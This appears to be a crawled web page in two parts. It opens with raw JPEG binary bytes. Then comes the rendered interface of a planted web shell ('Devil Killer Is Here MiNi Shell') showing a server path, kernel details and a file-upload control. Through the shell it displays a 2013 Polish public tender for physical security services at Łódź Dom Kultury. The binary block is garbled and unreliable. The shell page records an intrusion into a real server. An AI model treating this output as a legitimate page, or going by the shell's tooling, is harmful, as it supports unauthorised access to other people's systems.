JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130321/112512-N-2013.html

<p class="kh_header"><b>Łódź: Fizyczna ochrona obiektu, osób, mienia i otoczenia obiektu Łódzkiego Domu Kultury w Łodzi na rok 2013/2014 wraz z przejęciem części mienia i pracowników w trybie art. 23(1) Kodeksu Pracy</b><br>
<b>Numer ogłoszenia: 112512 - 2013; data zamieszczenia: 21.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Łódzki Dom Kultury , ul. Traugutta 18, 90-113 Łódź, woj. łódzkie, tel. 042 633 98 00 wew. 234, faks 042 633 70 96.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ldk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Fizyczna ochrona obiektu, osób, mienia i otoczenia obiektu Łódzkiego Domu Kultury w Łodzi na rok 2013/2014 wraz z przejęciem części mienia i pracowników w trybie art. 23(1) Kodeksu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Fizyczna ochrona obiektu, osób, mienia i otoczenia obiektu  Łódzkiego Domu Kultury w Łodzi na rok 2013/2014 wraz z przejęciem od Zamawiającego części mienia i pracowników w trybie art. 23(1) Kodeksu Pracy

Kod CPV: 79710000-4 Usługi ochroniarskie

A) Szczegółowy opis przedmiotu zamówienia w zakresie usługi ochrony osób i mienia:

1. Przedmiotem zamówienia jest całodobowa stała ochrona realizowana w formie  bezpośredniej ochrony fizycznej osób i mienia w budynku Łódzkiego Domu Kultury  w Łodzi przy ulicy Romualda Traugutta 18 ze wsparciem załogi interwencyjnej.
2. Stała bezpośrednia ochrona fizyczna pełniona całodobowo, zmianowo we wszystkie dni tygodnia - w tym soboty, niedziele i święta, polegać będzie na posterunku ochronnym (obserwacyjno-obchodowym) przez przeszkolonych pracowników oraz licencjonowanych pracowników podczas zmian nocnych i całodobowym wsparciu grupy interwencyjnej. 
3. Świadczenie usług powinno odbywać się w następującej obsadzie: 
a) dwie osoby w godzinach pracy ŁDK (od poniedziałku do piątku w godz. 8.00-22.00), 
b) dwie osoby codziennie poza godzinami pracy ŁDK - w godz. 22.00-8.00 oraz codziennie i nieprzerwanie 24 godz./dobę w dni wolne od pracy (soboty, niedziele, święta państwowe) na posterunku ochronnym (obserwacyjno-obchodowym),
c) dodatkowo (średnio) dwie osoby podczas imprez organizowanych w obiekcie - na zgłoszenie Zamawiającego, w godzinach przez niego wskazanych - średnio 10 godzin w miesiącu.
4. Usługi powinny być świadczone w godzinach:
a) we wszystkie robocze dni tygodnia (od poniedziałku do piątku) łącznie 48 h (na dobę) ochrony pełnionej przez  2-ch pracowników ochrony (12 h x 4)
b) dodatkowo 4 razy w m-cu przez 2 pracowników ochrony przez 5 h ( 5  h x 2 x 4)
c) we wszystkie dni świąteczne oraz soboty (za wyjątkiem pracujących) i niedziele łącznie 24 h (na dobę) ochrony pełnionej przez 2 pracowników ochrony (24 h x 2).
5) Obsługę szatni należy uwzględnić od dnia rozpoczęcia świadczenia usług do dnia 15 czerwca 2013 r., a następnie od 15 września 2013 r. do dnia zakończenia umowy. 
Szatnia winna być czynna w godzinach 800 - 2200, również w soboty i niedziele (oprócz świąt).
Zamawiający informuje i zastrzega sobie prawo do wykorzystania tylu godzin ochrony dodatkowej (pkt 4 b), ile jest niezbędne w razie nieprzewidzianych sytuacji, średnio będzie to około 10 godzin miesięcznie. Ochrona dodatkowa zlecona będzie wezwaniem pisemnym poprzedzonym telefonicznie tylko w wyjątkowych sytuacjach. 
W szczególnie uzasadnionych przypadkach Zamawiający zastrzega możliwość okresowej zmiany godzin świadczenia usługi dokonanej na pisemny wniosek Zamawiającego skierowany do Wykonawcy na co najmniej 5 dni przed zmianą.
Pracownicy ochrony wyznaczeni do ochrony budynku ŁDK w godzinach pracy i po godzinach pracy ŁDK oraz w dni wolne od pracy i święta  będą realizować ochronę dwuosobowo na terenie budynku oraz w najbliższym jego otoczeniu (w tym parking). Usługa będzie wykonywana całodobowo  i będzie polegać na posterunku ochronnym (obserwacyjno-obchodowym). 

6. Wykonawca zobowiązany jest do:
1) wydelegowania do realizacji przedmiotu zamówienia zawsze tych samych pracowników (zmianowo), a o każdej zmianie personalnej Wykonawca zobowiązany jest powiadomić Zamawiającego;
2) wydelegowania do realizacji przedmiotu zamówienia (w godzinach nocnych i podczas działań grupy interwencyjnej) pracowników posiadających licencję pracownika ochrony fizycznej, którzy nie są karani i posiadają odpowiednie doświadczenie; 
3) wyposażenia pracowników w jednolity mundur oraz imienne identyfikatory wraz ze zdjęciem, które należy nosić w trakcie realizacji przedmiotu zamówienia;
4) wyposażenia pracowników w niezbędny sprzęt i środki łączności bezprzewodowej, m.in. z grupą interwencyjną oraz latarkę; 
5) przeszkolenia pracowników ochrony w zakresie wykonywanej pracy  oraz w zakresie określonym w przepisach o ochronie informacji niejawnych w czasie obowiązywania umowy i po jej rozwiązaniu, Wykonawca zobowiązany jest do zachowania w tajemnicy wszelkich informacji, które mają wpływ na stan bezpieczeństwa Zamawiającego;
6) zapoznania pracowników ochrony z regulaminem organizacyjnym Łódzkiego Domu Kultury, planami ewakuacyjnymi oraz przepisami BHP i przeciwpożarowymi;
7) zapewnienia znajomości przez pracowników ochrony topografii obiektu, w tym rozkładu pomieszczeń, przebiegu dróg ewakuacyjnych itp.

7. Przedmiot zamówienia /obowiązki i zadania pracowników ochrony/ obejmuje w szczególności:
1) wykonywanie czynności zgodnie z przepisami regulującymi wykonywanie usług ochronnych, zasadami obrony koniecznej i stanu wyższej konieczności, z zachowaniem należytej staranności i w poszanowaniu godności osobistej osób;
2) zapobieganie zakłóceniom porządku publicznego na terenie ochranianego obiektu łącznie z zatrzymaniem osoby /osób/ powodujących w/w zakłócenia;
3) zapewnienie bezpieczeństwa i zapobieganie przed utratą zdrowia lub życia osób przebywających w granicach ochranianego obiektu;
4) stały monitoring i patrolowanie holi, korytarzy budynku oraz terenu nieruchomości, na którym się on znajduje (w tym parking);
5) obowiązek bezzwłocznego podjęcia interwencji związanej z zapewnieniem ładu i porządku podczas organizowanych imprez w budynku;
6) obowiązek przyjazdu grupy interwencyjnej w czasie nie dłuższym niż 10 minut licząc od chwili wezwania;
7) ochronę przed zaborem, zniszczeniem, uszkodzeniem dokumentów i mienia;
8) ochronę przed włamaniem, kradzieżą, napadem, rabunkiem i aktami wandalizmu na terenie ochranianego obiektu;
9) niezwłoczne powiadamianie organów ścigania /Policji/ oraz Dyrektora ŁDK o czynach przestępczych zaistniałych na terenie obiektu i zabezpieczenie miejsca ich popełnienia do czasu przybycia odpowiednich służb;
10) ochronę obiektu przed dostępem do niego osób nieuprawnionych;
11) prowadzenie szatni i ochrona mienia pozostawionego w szatni;
12) nie dopuszczanie do wejścia na teren obiektu ochranianego osób znajdujących się pod wpływem alkoholu lub środków odurzających;
13) nie dopuszczanie do wnoszenia na teren obiektu ochranianego broni, alkoholu oraz innych niebezpiecznych przedmiotów mogących zagrozić życiu i zdrowiu;
14) po godzinach pracy Łódzkiego Domu Kultury w dni robocze, a także w dni wolne od pracy sprawdzanie budynku, ze szczególnym zwróceniem uwagi na wyłączenie urządzeń elektrycznych, zakręcenie wody, zamknięcie okien i drzwi oraz wygaszenie oświetlenia;
15) prowadzenie niezbędnej dokumentacji służbowej /książki dyżurów w której pracownicy Wykonawcy wpisywać będą wszelkie spostrzeżenia, uwagi i istotne wydarzenia związane  ze sprawowaniem ochrony/ oraz dokumentacji wymaganej przez Dyrektora ŁDK;
16) umożliwienie Zamawiającemu w każdej chwili dostępu do dokumentacji wymienionej wyżej, a po jej zakończeniu przekazanie Zamawiającemu oryginałów lub sporządzenia ich kopii; 
17) składanie upoważnionemu pracownikowi Zamawiającego raportów dotyczących zdarzeń i incydentów zaistniałych podczas dyżuru - najpóźniej w ciągu 12 godzin od zdarzenia;
18) w razie pożaru w obiekcie, natychmiastowe powiadomienie Straży Pożarnej oraz wzmożenie czujności w celu uniemożliwienia zaboru mienia przez osoby postronne działające pod pozorem niesienia pomocy;
19) współdziałanie z jednostkami ochrony przeciwpożarowej w przypadkach zagrożenia pożarem na terenie obiektu;
20) pomoc w sprawnej ewakuacji osób przebywających w budynku w przypadku alarmu bombowego lub pożarowego;
21) w razie nieszczęśliwego wypadku wezwanie Pogotowia Ratunkowego;
22) reagowanie na mogące wystąpić sytuacje nagłe i awaryjne związane z instalacjami (elektryczną, wodno-kanalizacyjną, gazową, przeciwpożarową);
23) rzeczowe i kulturalne udzielanie podstawowych informacji na temat pracy Łódzkiego Domu Kultury;
24) okazjonalne udzielanie pomocy pracownikom i osobom przebywającym w ŁDK (np. przy transporcie osoby niepełnosprawnej), o ile nie wpływa to na stan ochrony obiektu;
25) przestrzeganie instrukcji p/pożarowej oraz instrukcji urządzeń zabezpieczających i alarmowych;
26) zachowanie w tajemnicy wszystkich informacji, które mają wpływ na stan bezpieczeństwa w czasie obowiązywania umowy;
27) wydawania pracownikom ŁDK kluczy do poszczególnych pomieszczeń przed rozpoczęciem pracy i przyjmowanie ich po zakończeniu pracy;
28) prowadzenie książki ewidencji kluczy tj. wpisywanie daty, godziny, imienia i nazwiska osoby pobierającej i zdającej klucze w odpowiedniej książce oraz żądanie potwierdzenia pobrania/zdania kluczy, poprzez złożenie czytelnego podpisu;
29) wydawanie pracownikom firm świadczącym usługi dla ŁDK  (np. utrzymania czystości) kluczy do poszczególnych pomieszczeń przed rozpoczęciem pracy i przyjmowanie ich po jej zakończeniu;
30) otwieranie i zamykanie drzwi wejściowych do budynku;
31) obsługa Wirtualnej Centralki Telefonicznej.


Poza powyższymi wymaganiami Zamawiający zastrzega, aby wszyscy pracownicy Wykonawcy, a obowiązkowo pracownicy serwisu dziennego, w trakcie wykonywania obowiązków wynikających z umowy, byli ubrani w jednolite ubrania służbowe opatrzone logo firmy Wykonawcy. Wykonawca zapewni każdej osobie wykonującej usługę odzież ochronną estetyczną i odpowiadającą powadze instytucji Zamawiającego.


Przed złożeniem oferty zalecane jest dokonanie wizji lokalnej obiektu będącego przedmiotem zamówienia, po uprzednim uzgodnieniu terminu z Kierownikiem Działu Gospodarczo - Administracyjnego, Panią Barbarą Stępień tel. (0-42) 633-58-29.  


B) OPIS PRZEDMIOTU ZAMÓWIENIA W ZAKRESIE ZASAD PRZEJĘCIA CZĘŚCI MIENIA I PRACOWNIKÓW ZAMAWIAJĄCEGO

W ramach postępowania Zamawiający przekaże Wykonawcy część mienia Zamawiającego i 11 pracowników w trybie art. 23(1) Kodeksu Pracy zatrudnionych obecnie przez Zamawiającego, na następujących zasadach: 

1. Z dniem podpisania umowy w sprawie zamówienia publicznego na realizację przedmiotu zamówienia, zgodnie z art. 23(1) Kodeksu Pracy Wykonawca staje się pracodawcą (stroną w dotychczasowych stosunkach pracy) w stosunku do 11 (słownie: jedenastu) pracowników Łódzkiego Domu Kultury. Szczegółowy wykaz pracowników objętych zamiarem przekazania wraz z niezbędnymi danymi dotyczącymi ich zatrudnienia i wynagrodzeń zostanie udostępniony na pisemny wniosek Wykonawcy, po uprzednim złożeniu przez Wykonawcę oświadczenia o zachowaniu poufności podpisanego przez upoważnionych przedstawicieli Wykonawcy. Wśród wymienionej grupy pracowników, znajduje 6 osób chronionych na podstawie art. 39 kodeksu pracy i 3 osoby chronione ze względu na przynależność związkową (art. 32 ust.1 i 2 ustawy z dnia 23 maja 1991 roku o związkach zawodowych). 
2. Wykonawca przekaże informację o przejęciu części zakładu pracy działającym u niego zakładowym organizacjom związkowym lub pracownikom zgodnie z treścią art. 26(1) Ustawy z dnia 23.05.1991r. o związkach zawodowych i art. 23(1) § 3 Kodeksu Pracy.
3. Przejęci pracownicy będą objęci obowiązującym w Łódzkim Domu Kultury Regulaminem wynagrodzenia przez okres co najmniej 1 roku od dnia podpisania umowy w sprawie zamówienia publicznego. 
4. W przypadku nie dotrzymania zobowiązań, o których mowa w ust. 3 Wykonawca zobowiązuje się do wypłaty wynagrodzenia przejętym pracownikom za czas pozostały do upływu gwarantowanego okresu zatrudnienia. 
5. Zamawiający przekaże Wykonawcy akta pracowników przejmowanych oraz pozostałą dokumentację związaną z ich stosunkami pracy. Przekazanie dokumentacji nastąpi na podstawie protokołu zdawczo-odbiorczego podpisanego przez upoważnionych przedstawicieli Zamawiającego i Wykonawcy. 
6. W sprawach nie uregulowanych w specyfikacji stosuje się zapisy wynikające z art. 23(1) Kodeksu Pracy oraz innych aktów prawnych regulujących warunki przejęcia części zakładu pracy.
7. Po upływie terminu realizacji umowy w sprawie zamówienia publicznego przejęci pracownicy pozostają pracownikami Wykonawcy.
8. Zamawiający przekazuje z dniem podpisania umowy na realizację zamówienia publicznego część mienia Zamawiającego, tj. pokój socjalny do wyłącznego użytku Wykonawcy w okresie realizacji umowy. Przekazanie mienia, tj. pokoju socjalnego następuje na okres realizacji niniejszego zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, w zakresie posiadania uprawnień do wykonywania określonej działalności, jeśli udokumentuje, że posiada aktualną koncesję Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz. U. z 2005 r., Nr 145, poz. 1221 z późn. zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli wykaże, że wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej dwie  usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie dotyczących ochrony osób i mienia, o wartości co najmniej 300 000,00 PLN brutto (słownie: trzysta tysięcy złotych 00/100) każda w skali roku.

Zamawiający informuje, że w przypadku, gdy usługi, o których mowa powyżej, były realizowane w ramach zamówienia obejmującego również inne świadczenia Wykonawcy, to za usługi główne uznane zostaną wyłącznie usługi ochrony fizycznej obiektu (obiektów) lub osób i mienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-------</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeśli udokumentuje, że posiada Grupę Szybkiego Reagowania z 3 osobami posiadającymi licencję pracownika ochrony.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeśli udokumentuje, że wykaże się posiadaniem ubezpieczenia odpowiedzialności cywilnej od wykonywanej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu;
2) pełnomocnictwo w przypadku, gdy Wykonawca będzie reprezentowany w postępowani przez pełnomocnika;
3) pełnomocnictwo, w przypadku złożenia przez Wykonawców oferty wspólnej, o której mowa w art. 23 ustawy Prawo zamówień publicznych;

4) w przypadku wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie - Wykonawca załączy wykaz wg załącznika nr 3. 
Uwaga! 
a) dowodem, o którym mowa powyżej jest poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
